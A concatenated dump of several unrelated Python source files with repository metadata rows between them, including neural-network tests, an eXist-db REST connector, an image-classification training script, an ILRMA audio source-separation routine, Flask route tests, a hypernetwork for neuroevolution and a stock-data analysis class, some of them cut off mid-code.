('Foo', 'd'),
],
'bar': [
('Bar', 'b', 'bar'),
('Bar', 'c', 'foo'),
],
}
class TupleTransTest(unittest.TestCase):
text = 'abcde'
Item = get_itemclass(text)
expected = [
Item(start=0, end=1, token='Root'),
Item(start=1, end=2, token='Bar'),
Item(start=2, end=3, token='Bar'),
Item(start=3, end=4, token='Foo'),
Item(start=4, end=5, token='Root')]
def test(self):
toks = list(TestableLexer(self.text))
self.assertEqual(toks, self.expected)
| 21.930233
| 54
| 0.510074
| 836
| 0.886532
| 0
| 0
| 0
| 0
| 0
| 0
| 162
| 0.171792
|
b8187e4887ed852a5b867debdeeccee5408895fe
| 7,134
|
py
|
Python
|
Engine/src/tests/algorithms/neuralnetwork/convolutional/conv_net_test.py
|
xapharius/HadoopML
|
c0129f298007ca89b538eb1a3800f991141ba361
|
[
"MIT"
] | 2
|
2018-02-05T12:41:31.000Z
|
2018-11-23T04:13:13.000Z
|
Engine/src/tests/algorithms/neuralnetwork/convolutional/conv_net_test.py
|
xapharius/HadoopML
|
c0129f298007ca89b538eb1a3800f991141ba361
|
[
"MIT"
] | null | null | null |
Engine/src/tests/algorithms/neuralnetwork/convolutional/conv_net_test.py
|
xapharius/HadoopML
|
c0129f298007ca89b538eb1a3800f991141ba361
|
[
"MIT"
] | null | null | null |
import unittest
import numpy as np
import utils.imageutils as imgutils
import utils.numpyutils as nputils
from algorithms.neuralnetwork.convolutional.conv_net import ConvNet
from datahandler.numerical.NumericalDataSet import NumericalDataSet
import utils.serialization as srlztn
def gen_vertical_bars(num):
bars = []
for _ in range(num):
x, y = np.random.randint(low=0, high=15, size=2)
length = np.random.randint(low=4, high=13)
bar = np.zeros((16, 16))
bar[y:y+length, x:x+2] = 1
bars.append(bar)
return bars
def gen_horizontal_bars(num):
bars = []
for _ in range(num):
x, y = np.random.randint(low=0, high=15, size=2)
length = np.random.randint(low=4, high=13)
bar = np.zeros((16, 16))
bar[y:y+2, x:x+length] = 1
bars.append(bar)
return bars
class Test(unittest.TestCase):
def test_bars(self):
# 16x16 images with bars that are 2 pixel thick
train_verticals = gen_vertical_bars(50)
train_horizontals = gen_horizontal_bars(50)
test_verticals = gen_vertical_bars(50)
test_horizontals = gen_horizontal_bars(50)
inputs = np.array(train_verticals + train_horizontals)
targets = np.array([[1, 0] for _ in train_verticals] + [[0, 1] for _ in train_horizontals])
data_set = NumericalDataSet(inputs, targets)
test_inputs = np.array(test_verticals + test_horizontals)
test_targets = np.array([[1, 0] for _ in test_verticals] + [[0, 1] for _ in test_horizontals])
test_data_set = NumericalDataSet(test_inputs, test_targets)
# 16x16 -> C(3): 14x14 -> P(2): 7x7 -> C(3): 5x5 -> P(5): 1x1
net_topo = [('c', 3, 6), ('p', 2), ('c', 3, 8), ('p', 5), ('mlp', 8, 8, 2)]
net = ConvNet(iterations=50, learning_rate=0.001, topo=net_topo)
net.train(data_set)
preds = net.predict(test_data_set)
conf_mat = nputils.create_confidence_matrix(preds, test_targets, 2)
print "Error rate: " + str(100 - (np.sum(conf_mat.diagonal()) / np.sum(conf_mat[:, :]) * 100)) + "%"
def test_mnist_digits(self):
digits, labels = imgutils.load_mnist_digits('../../data/mnist-digits/train-images.idx3-ubyte', '../../data/mnist-digits/train-labels.idx1-ubyte', 300)
targets = np.array([ nputils.vec_with_one(10, digit) for digit in labels ])
train_data_set = NumericalDataSet(np.array(digits)[:150], targets[:150])
test_data_set = NumericalDataSet(np.array(digits)[150:], targets[150:])
# 28x28 -> C(5): 24x24 -> P(2): 12x12 -> C(5): 8x8 -> P(2): 4x4 -> C(4): 1x1
net_topo = [('c', 5, 8), ('p', 2), ('c', 5, 16), ('p', 2), ('c', 4, 16), ('mlp', 16, 16, 10)]
net = ConvNet(iterations=30, learning_rate=0.01, topo=net_topo, activation_func=(nputils.rectifier, nputils.rectifier_deriv))
net.train(train_data_set)
try:
srlztn.save_object('../../trained/mnist_digits.cnn', net)
except:
print("serialization error")
preds = net.predict(test_data_set)
conf_mat = nputils.create_confidence_matrix(preds, targets[150:], 10)
print conf_mat
num_correct = np.sum(conf_mat.diagonal())
num_all = np.sum(conf_mat[:, :])
print "Error rate: " + str(100 - (num_correct / num_all * 100)) + "% (" + str(int(num_correct)) + "/" + str(int(num_all)) + ")"
def test_face_recognition(self):
faces = imgutils.load_images('/home/simon/trainingdata/faces/', max_num=100)
non_faces = imgutils.load_images('/home/simon/trainingdata/nonfaces/', max_num=100)
faces_training = faces[0:50]
faces_testing = faces[50:]
non_faces_training = non_faces[0:50]
non_faces_testing = non_faces[50:]
inputs_training = np.array(faces_training + non_faces_training)
targets_training = np.array([ [1, 0] for _ in range(len(faces_training))] + [ [0, 1] for _ in range(len(non_faces_training))])
data_set_training = NumericalDataSet(inputs_training, targets_training)
inputs_testing = np.array(faces_testing + non_faces_testing)
targets_testing = np.array([ [1, 0] for _ in range(len(faces_testing))] + [ [0, 1] for _ in range(len(non_faces_testing))])
data_set_testing = NumericalDataSet(inputs_testing, targets_testing)
# 24x24 -> C(5): 20x20 -> P(2): 10x10 -> C(3): 8x8 -> P(2): 4x4 -> C(3): 2x2 -> p(2): 1x1
net_topo = [('c', 5, 8), ('p', 2), ('c', 3, 16), ('p', 2), ('c', 3, 24), ('p', 2), ('mlp', 24, 24, 2)]
net = ConvNet(iterations=30, learning_rate=0.01, topo=net_topo)
net.train(data_set_training)
preds = net.predict(data_set_testing)
conf_mat = nputils.create_confidence_matrix(preds, targets_testing, 2)
num_correct = np.sum(conf_mat.diagonal())
num_all = np.sum(conf_mat[:, :])
print "Error rate: " + str(100 - (num_correct / num_all * 100)) + "% (" + str(int(num_correct)) + "/" + str(int(num_all)) + ")"
# fig = plt.figure(1)
# plt.set_cmap('gray')
# num_rows = 6x-img.shape[0]
# num_cols = 4
# fig.add_subplot(num_rows, num_cols, 1)
# plt.imshow(faces[0])
# for fm_idx in range(4):
# fig.add_subplot(num_rows, num_cols, num_cols*1 + fm_idx + 1)
# plt.imshow(convolved1[fm_idx, :, :])
# fig.add_subplot(num_rows, num_cols, num_cols*2 + fm_idx + 1)
# plt.imshow(pooled1[fm_idx, :, :])
# fig.add_subplot(num_rows, num_cols, num_cols*3 + fm_idx + 1)
# plt.imshow(convolved2[fm_idx, :, :])
# fig.add_subplot(num_rows, num_cols, num_cols*4 + fm_idx + 1)
# plt.imshow(np.array([[pooled2[0, fm_idx]]]), vmin=0, vmax=1)
# fig.add_subplot(num_rows, num_cols, 21)
# plt.imshow(np.array([[mlp_out[2][0, 0]]]), vmin=0, vmax=1)
# fig.add_subplot(num_rows, num_cols, 22)
# plt.imshow(np.array([[mlp_out[2][0, 1]]]), vmin=0, vmax=1)
#
# plt.show()
def test_smoke(self):
smoke_imgs_training = imgutils.load_images('/home/simon/smoke/training/smoke/', max_num=100)
non_smoke_imgs_training = imgutils.load_images('/home/simon/smoke/training/non-smoke/', max_num=100)
inputs_training = np.array(smoke_imgs_training + non_smoke_imgs_training)
targets_training = np.array([ [1, 0] for _ in range(len(smoke_imgs_training))] + [ [0, 1] for _ in range(len(non_smoke_imgs_training))])
data_set_training = NumericalDataSet(inputs_training, targets_training)
# 100x100 -> C(5): 96x96 -> P(2): 48x48 -> C(5): 44x44 -> P(2): 22x22 -> C(3): 20x20 -> P(2): 10x10 -> C(3): 8x8 -> P(2) 4x4 -> C(3): 2x2 -> P(2): 1x1
net_topo = [('c', 5, 8), ('p', 2), ('c', 5, 16), ('p', 2), ('c', 3, 24), ('p', 2), ('c', 3, 24), ('p', 2), ('c', 3, 24), ('p', 2), ('mlp', 24, 24, 2)]
net = ConvNet(iterations=30, learning_rate=0.01, topo=net_topo)
net.train(data_set_training)
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
| 49.2
| 158
| 0.610457
| 6,182
| 0.866555
| 0
| 0
| 0
| 0
| 0
| 0
| 1,773
| 0.248528
|
b819490a0e749fdb6fa33717dab9405f34226e11
| 2,747
|
py
|
Python
|
docker/eXist-seed/app/connector.py
|
ThomasTos/Pogues-Back-Office
|
b346d94407bf36e37d705b1d220ab0775a120574
|
[
"MIT"
] | null | null | null |
docker/eXist-seed/app/connector.py
|
ThomasTos/Pogues-Back-Office
|
b346d94407bf36e37d705b1d220ab0775a120574
|
[
"MIT"
] | 23
|
2017-08-25T16:48:57.000Z
|
2022-02-16T00:55:42.000Z
|
docker/eXist-seed/app/connector.py
|
ThomasTos/Pogues-Back-Office
|
b346d94407bf36e37d705b1d220ab0775a120574
|
[
"MIT"
] | 13
|
2017-07-03T09:15:36.000Z
|
2021-07-02T07:43:10.000Z
|
import requests
from requests.auth import HTTPBasicAuth
import sys
import os
from string import rfind
import base64
class XdbException(Exception):
'''Exist db connector exception'''
class Connector:
def __init__(self, url, user, password):
self.url = url
self.auth = HTTPBasicAuth(user, password)
'''
Create collection
'''
def create(self, root, collection):
print "creating collection %s in %s ..." % (collection, root)
params = {
'_query': 'xmldb:create-collection("%s","%s")'% (root, collection)
}
response = requests.get('%s/exist/rest/db'% (self.url), auth=self.auth, params=params)
if 200 != response.status_code:
raise XdbException
return '%s/%s'%(root, collection)
'''
chmod resource
Apply given permission on eXist-db resource,
'''
def chmod(self, resource, permissions):
print "setting permissions %s on %s "% (permissions, resource)
params = {
'_query': 'sm:chmod(xs:anyURI("%s"), "%s")'% (resource, permissions)
}
response = requests.get('%s/exist/rest/db'% (self.url), auth=self.auth, params=params)
if 200 != response.status_code:
raise XdbException
'''
Put document to collection
Collection will be created if it does not exist
'''
def upload(self, fsPath, collection):
print "storing from fs path %s to collection /%s ..." % (fsPath, collection)
_, doc = os.path.split(fsPath)
__, extension = os.path.splitext(doc)
print 'extension, doc', extension, doc
f = open(fsPath, 'r')
xqm= f.read()
f.close()
content_types = {
'.xqm': 'application/xquery',
'.xq': 'application/xquery',
'.xpl': 'application/xml',
'.xquery': 'application/xquery',
'.xml': 'application/xml',
'.xconf': 'application/xml',
'.xhtml': 'application/xml',
'.xsl': 'application/xml'
}
headers = {
'Content-Type': content_types[extension]
}
response = requests.put('%s/exist/rest/% s/%s'% (self.url, collection, doc), auth=self.auth, headers=headers, data=xqm)
if 201 != response.status_code:
print str(response)
raise XdbException
return '%s/%s' % (collection, doc)
'''
Execute a stored Xquery remotely
'''
def execute(self, document):
headers = {
'Content-Type': 'application/xquery'
}
response = requests.get('%s/exist/rest/%s'% (self.url, document), auth=self.auth, headers=headers)
if 200 != response.status_code:
raise XdbException
return response
| 32.702381
| 127
| 0.581361
| 2,628
| 0.95668
| 0
| 0
| 0
| 0
| 0
| 0
| 844
| 0.307244
|
b81a09ef1cba709f702bd49fe66d6f2697a395a3
| 5,736
|
py
|
Python
|
handy/2011722086_Assign3/main_app.py
|
HDNua/kwin
|
33ce866c2b37faa1a5940354a0e5b3919e5eecc8
|
[
"MIT"
] | 2
|
2017-11-01T12:46:06.000Z
|
2017-12-02T04:01:25.000Z
|
handy/2011722086_Assign3/main_app.py
|
HDNua/kwin
|
33ce866c2b37faa1a5940354a0e5b3919e5eecc8
|
[
"MIT"
] | null | null | null |
handy/2011722086_Assign3/main_app.py
|
HDNua/kwin
|
33ce866c2b37faa1a5940354a0e5b3919e5eecc8
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Tue May 30 16:43:10 2017
☜☜☜☜☜☜★☆★☆★☆★☆ provided code ★☆★☆★☆★☆☞☞☞☞☞☞
@author: Minsooyeo
"""
import os
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
from PIL import Image as im
import numpy as np
import utills as ut
import tensorflow as tf
sess = tf.InteractiveSession()
train_epoch = 5000
#
FLAG_FINGER = 0
FLAG_FACE = 1
FLAG_ANGLE = 2
flag = FLAG_ANGLE
#
if flag is FLAG_FINGER:
class_num = 5
additional_path = '\\finger\\'
elif flag is FLAG_FACE:
class_num = 6
additional_path = '\\face\\'
elif flag is FLAG_ANGLE:
class_num = 4
additional_path = '\\angle\\'
else:
raise Exception("Unknown flag %d" %flag)
# define parameter
data_length = []
dir_image = []
data = []
label = []
data_shape = [298, 298]
current_pwd = os.getcwd()
for i in range(class_num):
dir_image.append(ut.search(current_pwd + additional_path + str(i + 1)))
data_length.append(len(dir_image[i]))
data.append(np.zeros([data_length[i], data_shape[1], data_shape[0]]))
label.append(np.zeros([data_length[i], class_num]))
label[i][:, i] = 1
# load data
for q in range(class_num):
for i in range(data_length[q]):
if i % 100 == 0:
print("%dth data is opening" %i)
data[q][i, :, :] = np.mean(im.open(current_pwd + additional_path + str(q + 1) + '\\' + dir_image[q][i]), -1)
if flag is FLAG_FINGER:
rawdata = np.concatenate((data[0], data[1], data[2], data[3], data[4]), axis=0)
raw_label = np.concatenate((label[0], label[1], label[2], label[3], label[4]), axis=0)
elif flag is FLAG_FACE:
rawdata = np.concatenate((data[0], data[1], data[2], data[3], data[4], data[5]), axis=0)
raw_label = np.concatenate((label[0], label[1], label[2], label[3], label[4], label[5]), axis=0)
elif flag is FLAG_ANGLE:
rawdata = np.concatenate((data[0], data[1], data[2], data[3]), axis=0)
raw_label = np.concatenate((label[0], label[1], label[2], label[3]), axis=0)
else:
raise Exception("Unknown class number %d" %class_num)
del data
del label
total_data_poin = rawdata.shape[0]
permutation = np.random.permutation(total_data_poin)
rawdata = rawdata[permutation, :, :]
raw_label = raw_label[permutation, :]
rawdata = np.reshape(rawdata, [rawdata.shape[0], data_shape[0] * data_shape[1]])
########################################################################################################
#
img_width = data_shape[0]
img_height = data_shape[1]
if flag is FLAG_FINGER:
train_count = 5000 # 손가락 인식을 테스트하려는 경우 이 부분을 수정하십시오. (2000 또는 5000으로 테스트함)
test_count = 490
elif flag is FLAG_FACE:
train_count = 2000 # train data 수가 5000개가 안 돼서 또는 overfitting에 의해 NaN 문제가 발생합니다. 값을 바꾸지 마십시오!
test_count = 490
elif flag is FLAG_ANGLE:
train_count = 6000 # train data 수가 5000개가 안 돼서 또는 overfitting에 의해 NaN 문제가 발생합니다. 값을 바꾸지 마십시오!
test_count = 1000
else:
raise Exception("unknown flag %d" %flag)
#
train_epoch = train_count
#
TrainX = rawdata[:train_count] # mnist.train.images
TrainY = raw_label[:train_count] # mnist.train.labels
testX = rawdata[train_count:train_count+test_count] # mnist.test.images
testY = raw_label[train_count:train_count+test_count] # mnist.test.labels
# 손가락 구분을 테스트하기 위해 층의 수를 바꾸는 경우 else 부분을 수정하십시오.
if flag is FLAG_FINGER: # 손가락 구분의 경우 층에 따라 경우를 테스트하려면 이 부분을 수정하십시오.
CNNModel, x = ut._CNNModel(img_width=img_width, img_height=img_height,
kernel_info=[
[3, 2, 32, True],
[3, 2, 64, True],
[3, 2, 128, True],
[3, 2, 64, True],
[3, 2, 128, True],
# [3, 2, 128, True],
])
elif flag is FLAG_FACE: # 얼굴 인식의 경우 2개의 층만으로도 구분이 완전히 잘 됩니다. 층의 수를 수정하지 마십시오.
CNNModel, x = ut._CNNModel(img_width=img_width, img_height=img_height,
kernel_info=[
[3, 2, 32, True],
[3, 2, 64, True],
# [3, 2, 128, True],
# [3, 2, 64, True],
# [3, 2, 128, True],
# [3, 2, 128, True],
])
elif flag is FLAG_ANGLE: #
CNNModel, x = ut._CNNModel(img_width=img_width, img_height=img_height,
kernel_info=[
[1, 1, 32, True],
# [1, 1, 64, True],
# [1, 1, 128, True],
# [1, 1, 64, True],
# [1, 1, 128, True],
# [3, 2, 128, True],
])
else:
raise Exception("Unknown flag %d" %flag)
FlatModel = ut._FlatModel(CNNModel, fc_outlayer_count=128)
DropOut, keep_prob = ut._DropOut(FlatModel)
SoftMaxModel = ut._SoftMax(DropOut, label_count=class_num, fc_outlayer_count=128)
TrainStep, Accuracy, y_, correct_prediction = ut._SetAccuracy(SoftMaxModel, label_count=class_num)
sess.run(tf.global_variables_initializer())
for i in range(train_epoch):
tmp_trainX, tmp_trainY = ut.Nextbatch(TrainX, TrainY, 50)
if i%100 == 0:
train_accuracy = Accuracy.eval(feed_dict={x: tmp_trainX, y_: tmp_trainY, keep_prob: 1.0})
print("step %d, training accuracy %g"%(i, train_accuracy))
TrainStep.run(feed_dict={x: tmp_trainX, y_: tmp_trainY, keep_prob: 0.7})
print("test accuracy %g" %Accuracy.eval(feed_dict={x: testX[1:1000, :], y_: testY[1:1000], keep_prob: 1.0}))
| 36.303797
| 116
| 0.566597
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,506
| 0.244163
|
b81de3e83d88be8e9727e5be630e392a0dd09037
| 3,176
|
py
|
Python
|
ilrma.py
|
annie-gu/MVAE
|
252b052d69eae9a0b47f4058baf0fe565992f12f
|
[
"MIT"
] | 1
|
2022-01-08T03:31:31.000Z
|
2022-01-08T03:31:31.000Z
|
ilrma.py
|
annie-gu/MVAE
|
252b052d69eae9a0b47f4058baf0fe565992f12f
|
[
"MIT"
] | null | null | null |
ilrma.py
|
annie-gu/MVAE
|
252b052d69eae9a0b47f4058baf0fe565992f12f
|
[
"MIT"
] | 2
|
2020-06-21T12:55:53.000Z
|
2020-11-16T00:56:36.000Z
|
import numpy as np
from common import projection_back
EPS = 1e-9
def ilrma(mix, n_iter, n_basis=2, proj_back=True):
"""Implementation of ILRMA (Independent Low-Rank Matrix Analysis).
This algorithm is called ILRMA1 in http://d-kitamura.net/pdf/misc/AlgorithmsForIndependentLowRankMatrixAnalysis.pdf
It only works in determined case (n_sources == n_channels).
Args:
mix (numpy.ndarray): (n_frequencies, n_channels, n_frames)
STFT representation of the observed signal.
n_iter (int): Number of iterations.
n_basis (int): Number of basis in the NMF model.
proj_back (bool): If use back-projection technique.
Returns:
tuple[numpy.ndarray, numpy.ndarray]: Tuple of separated signal and
separation matrix. The shapes of separated signal and separation
matrix are (n_frequencies, n_sources, n_frames) and
(n_sources, n_channels), respectively.
"""
n_freq, n_src, n_frame = mix.shape
sep_mat = np.stack([np.eye(n_src, dtype=mix.dtype) for _ in range(n_freq)])
basis = np.abs(np.random.randn(n_src, n_freq, n_basis))
act = np.abs(np.random.randn(n_src, n_basis, n_frame))
sep = sep_mat @ mix
sep_pow = np.power(np.abs(sep), 2) # (n_freq, n_src, n_frame)
model = basis @ act # (n_src, n_freq, n_frame)
m_reci = 1 / model
eye = np.tile(np.eye(n_src), (n_freq, 1, 1))
for _ in range(n_iter):
for src in range(n_src):
h = (sep_pow[:, src, :] * m_reci[src]**2) @ act[src].T
h /= m_reci[src] @ act[src].T
h = np.sqrt(h, out=h)
basis[src] *= h
np.clip(basis[src], a_min=EPS, a_max=None, out=basis[src])
model[src] = basis[src] @ act[src]
m_reci[src] = 1 / model[src]
h = basis[src].T @ (sep_pow[:, src, :] * m_reci[src]**2)
h /= basis[src].T @ m_reci[src]
h = np.sqrt(h, out=h)
act[src] *= h
np.clip(act[src], a_min=EPS, a_max=None, out=act[src])
model[src] = basis[src] @ act[src]
m_reci[src] = 1 / model[src]
h = m_reci[src, :, :, None] @ np.ones((1, n_src))
h = mix.conj() @ (mix.swapaxes(1, 2) * h)
u_mat = h.swapaxes(1, 2) / n_frame
h = sep_mat @ u_mat + EPS * eye
sep_mat[:, src, :] = np.linalg.solve(h, eye[:, :, src]).conj()
h = sep_mat[:, src, None, :] @ u_mat
h = (h @ sep_mat[:, src, :, None].conj()).squeeze(2)
sep_mat[:, src, :] = (sep_mat[:, src, :] / np.sqrt(h).conj())
np.matmul(sep_mat, mix, out=sep)
np.power(np.abs(sep), 2, out=sep_pow)
np.clip(sep_pow, a_min=EPS, a_max=None, out=sep_pow)
for src in range(n_src):
lbd = np.sqrt(np.sum(sep_pow[:, src, :]) / n_freq / n_frame)
sep_mat[:, src, :] /= lbd
sep_pow[:, src, :] /= lbd ** 2
model[src] /= lbd ** 2
basis[src] /= lbd ** 2
# Back-projection technique
if proj_back:
z = projection_back(sep, mix[:, 0, :])
sep *= np.conj(z[:, :, None])
return sep, sep_mat
| 37.809524
| 119
| 0.55699
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 913
| 0.287469
|
b81ecc580a437a3d551ab5dfa4a59c26d6b5e052
| 367
|
py
|
Python
|
tests/routes/test_pages.py
|
Biosystems-Analytics-Lab/shellcast
|
8d578bfa3d66d75502f1a133fe6263d376694247
|
[
"CC-BY-4.0"
] | 5
|
2021-03-24T19:19:48.000Z
|
2022-01-11T09:27:13.000Z
|
tests/routes/test_pages.py
|
Biosystems-Analytics-Lab/shellcast
|
8d578bfa3d66d75502f1a133fe6263d376694247
|
[
"CC-BY-4.0"
] | 1
|
2022-01-13T15:11:09.000Z
|
2022-01-13T21:16:10.000Z
|
tests/routes/test_pages.py
|
Biosystems-Analytics-Lab/shellcast
|
8d578bfa3d66d75502f1a133fe6263d376694247
|
[
"CC-BY-4.0"
] | null | null | null |
import pytest
def test_index(client):
res = client.get('/')
assert res.status_code == 200
def test_about(client):
res = client.get('/about')
assert res.status_code == 200
def test_preferences(client):
res = client.get('/preferences')
assert res.status_code == 200
def test_signin(client):
res = client.get('/signin')
assert res.status_code == 200
| 20.388889
| 34
| 0.700272
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 34
| 0.092643
|
b81fcb30f8bd89568af442548e95ceeba2331cfd
| 412
|
py
|
Python
|
Task -01/loop.py
|
kanzul12/cp19_voice_detector
|
db5478b118bab46897b4230d366e11b9ad65e0ce
|
[
"MIT"
] | 2
|
2019-04-19T08:26:09.000Z
|
2019-04-30T12:52:58.000Z
|
Task -01/loop.py
|
kanzul12/cp19_voice_detector
|
db5478b118bab46897b4230d366e11b9ad65e0ce
|
[
"MIT"
] | 5
|
2019-05-03T07:47:35.000Z
|
2019-05-13T08:37:11.000Z
|
Task -01/loop.py
|
kanzul12/cp19_voice_detector
|
db5478b118bab46897b4230d366e11b9ad65e0ce
|
[
"MIT"
] | null | null | null |
num= int (input("enter number of rows="))
for i in range (1,num+1):
for j in range(1,num-i+1):
print (" ",end="")
for j in range(2 and 9):
print("2","9")
for i in range(1, 6):
for j in range(1, 10):
if i==5 or i+j==5 or j-i==4:
print("*", end="")
else:
print(end=" ")
print()
| 16.48
| 44
| 0.383495
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 42
| 0.101942
|
6293f58cd98657d8f6c935c1d17ddd8632667efa
| 4,819
|
py
|
Python
|
examples/racing/models/HyperNN.py
|
Chris-Carvelli/DeepNeuroevolution
|
72e11fd08273ee1b25c346abd90b76a5975c39db
|
[
"MIT"
] | null | null | null |
examples/racing/models/HyperNN.py
|
Chris-Carvelli/DeepNeuroevolution
|
72e11fd08273ee1b25c346abd90b76a5975c39db
|
[
"MIT"
] | null | null | null |
examples/racing/models/HyperNN.py
|
Chris-Carvelli/DeepNeuroevolution
|
72e11fd08273ee1b25c346abd90b76a5975c39db
|
[
"MIT"
] | 1
|
2021-05-14T15:08:15.000Z
|
2021-05-14T15:08:15.000Z
|
import random
import math
from functools import reduce
import torch
import torch.nn as nn
def random_z_v(z_dim, z_num):
# ret = np.random.normal(0.01, 1.0, z_dim * z_num)
return torch.distributions.normal.Normal(torch.zeros([z_num, z_dim]), 0.1).sample()
class HyperNN(nn.Module):
def __init__(self, obs_space, action_space, pnn, tiling=64, shrink=1):
super().__init__()
self._tiling = tiling
self.z_dim = int(32 * shrink)
self.z_v_evolve_prob = 0.5
self.pnn = pnn(obs_space, action_space)
self.pnn_modules = list(dict(self.pnn.named_children()).keys())
self.out_features = self._get_out_features()
self.z_num, self.z_indexer = self._get_z_num()
in_size = int(128 * shrink)
self.hnn = nn.Sequential(
nn.Linear(self.z_dim, in_size),
nn.ReLU(),
nn.Linear(in_size, in_size),
nn.ReLU(),
nn.Linear(in_size, self.out_features),
)
self.register_buffer('z_v', random_z_v(self.z_dim, self.z_num))
self.add_tensors = {}
self._init_nn()
def forward(self, layer_index=None):
if layer_index is None:
return [self.hnn(x) for x in self.z_v]
else:
if isinstance(layer_index, int):
module_name = self.pnn_modules[layer_index]
else:
module_name = layer_index
z_shard = self.z_indexer[module_name]
return [self.hnn(x) for x in self.z_v[z_shard]]
def evolve(self, sigma):
coin_toss = random.random()
if coin_toss > self.z_v_evolve_prob:
# evolve z vector
module_idx = math.floor(random.random() * len(self.pnn_modules))
module_name = self.pnn_modules[module_idx]
for name in self.z_indexer:
if module_name in name:
z_shard = self.z_indexer[name]
self.z_v[z_shard] += torch.distributions.normal.Normal(
torch.zeros([z_shard.stop - z_shard.start, self.z_dim]),
sigma
).sample()
self._update_pnn()
else:
# evolve weights
params = self.named_parameters()
for name, tensor in sorted(params):
if 'z_v' not in name:
to_add = self.add_tensors[tensor.size()]
to_add.normal_(0.0, sigma)
tensor.data.add_(to_add)
self._update_pnn()
def evaluate(self, env, max_eval, render=False, fps=60):
return self.pnn.evaluate(env, max_eval, render, fps)
def _init_nn(self):
for name, tensor in self.named_parameters():
if tensor.size() not in self.add_tensors:
self.add_tensors[tensor.size()] = torch.Tensor(tensor.size())
if 'weight' in name:
nn.init.kaiming_normal_(tensor)
elif 'z_v' not in name:
tensor.data.zero_()
self._update_pnn()
# tiling not supported (but it should be a bit faster, performance gain unclear)
def _update_pnn(self):
weights = self()
if self._tiling:
for name, param in self.pnn.named_parameters():
z_shard = self.z_indexer[name]
param.data = self._shape_w(weights[z_shard], param.shape).data
else:
i = 0
for name, param in self.pnn.named_parameters():
param.data = self._shape_w(weights[i], param.shape).data
i += 1
def _shape_w(self, w, layer_shape):
if isinstance(w, list):
w = torch.cat(w)
w = torch.Tensor(w)
w = torch.narrow(w, 0, 0, reduce((lambda x, y: x * y), layer_shape))
w = w.view(layer_shape)
return w
def _get_z_num(self):
z_num = 0
z_indexer = {}
# tiling
for name, param in self.pnn.named_parameters():
if self._tiling is not None:
layer_shape = param.shape
layer_size = reduce((lambda x, y: x * y), layer_shape, 1)
z_shard = math.ceil(layer_size / self.out_features)
z_indexer[name] = slice(z_num, z_num + z_shard, 1)
z_num += z_shard
else:
z_num += 1
return z_num, z_indexer
def _get_out_features(self):
if self._tiling is not None:
return self._tiling
ret = 0
for name, param in self.pnn.named_parameters():
if 'weight' in name:
layer_shape = param.shape
layer_size = reduce((lambda x, y: x * y), layer_shape)
if layer_size > ret:
ret = layer_size
return ret
| 32.782313
| 87
| 0.552812
| 4,550
| 0.944179
| 0
| 0
| 0
| 0
| 0
| 0
| 202
| 0.041917
|
62961303726bbf57667dd5ce6020b5b0a4afb7e5
| 8,351
|
py
|
Python
|
O.py
|
duongnguyenkt11/data-realtime
|
9d8f6c8e0f6a766c058d0696669543dbafaff63c
|
[
"MIT"
] | null | null | null |
O.py
|
duongnguyenkt11/data-realtime
|
9d8f6c8e0f6a766c058d0696669543dbafaff63c
|
[
"MIT"
] | null | null | null |
O.py
|
duongnguyenkt11/data-realtime
|
9d8f6c8e0f6a766c058d0696669543dbafaff63c
|
[
"MIT"
] | null | null | null |
from functools import reduce
from bokeh.plotting import figure, output_file, show
from bokeh.io import output_notebook
from CONSTANTS import *
from utilities import *
from bokeh.plotting import figure, output_file, show
import pandas as pd, numpy as np
ENVIRON = C.LOCAL
def mmap(*args):
return list(map(*args))
class O:
################################################################################
# Init #
################################################################################
def __init__(self, cleansed, df=None):
self.cleansed = cleansed
self.n = len(cleansed[C.CTIME])
self.hoseData = {cleansed[C.CTIME][i]: cleansed[C.CHOSE][i] for i in range(len(cleansed[C.CTIME]))}
self.hoseArr = cleansed[C.CHOSE]
self.stocks = sorted(list(cleansed[C.CHOSE][0].keys()))
self.times = cleansed[C.CTIME]
self.errorDataPoints = []
self.hours = mmap(numerizeTime, self.times)
self.seconds = mmap(toSeconds, self.times)
self.Xs = mmap(numerizeTime, self.times)
self.p = figure(plot_width=1400, plot_height=400)
self.df = pd.DataFrame.from_dict(self.cleansed)
self.nnBuyVolumes = [-1] * self.n
self.nnSellVolumes = [-1] * self.n
self.nnBuyValues = [-1] * self.n
self.nnSellValues = [-1] * self.n
self.numpied = False
self.allPlots = []
self.intervals = []
self.totalLiquidity = []
def numpyItUp(self):
if self.numpied: return
self.numpied = True
a = [self.nnBuyVolumes, self.nnSellVolumes, self.nnBuyValues, self.nnSellValues,
self.hours, self.seconds, self.Xs, self.times]
for x in a:
x = np.array(x)
################################################################################
# Utilities - Misc #
################################################################################
def timeRange(self, start, end):
resStart, resEnd = -1, -1
for i in range(1, len(self.Xs)):
if self.Xs[i] > start:
resStart = i - 1
break
for i in range(len(self.Xs) - 1, 0, -1):
if self.Xs[i] < end:
resEnd = i + 1
break
return resStart, resEnd
def setInterval(self, STEP=60):
return
###############################################################################
# Computation #
###############################################################################
def _calculateNNVolumes_i(self, i):
time = self.times[i]
print(f"\r{i}: {time}", end="")
hose = self.hoseData[time]
buys, sells = [], []
try:
buys = mmap(lambda stock: hose[stock][C.NN_BUY], self.stocks)
sells = mmap(lambda stock: hose[stock][C.NN_SELL], self.stocks)
except:
self.errorDataPoints.append(time)
finally:
if len(buys) > 0 and len(sells) > 0:
self.nnBuyVolumes[i] = buys
self.nnSellVolumes[i] = sells
def calculateNNVolumes(self):
mmap(self._calculateNNVolumes_i, range(self.n))
def _calculateNNValues_i(self, i):
time = self.times[i]
hose = self.hoseData[time]
print(f"\r{i}: {time}", end="")
self.nnBuyValues[i] = (reduce(lambda a, b: a + b,
map(lambda stock: hose[stock][C.NN_BUY] * hose[stock][C.COL_AVG_PRICE], self.stocks)))
self.nnSellValues[i] = (reduce(lambda a, b: a + b,
map(lambda stock: hose[stock][C.NN_SELL] * hose[stock][C.COL_AVG_PRICE],
self.stocks)))
def calculateNNValues(self):
mmap(self._calculateNNValues_i, range(self.n))
def applyPricingConventions(self):
self.nnBuyValues = [x / 100000 for x in self.nnBuyValues]
self.nnSellValues = [x / 100000 for x in self.nnSellValues]
def calculateTradedValues(self):
def valAtSnapShot(time):
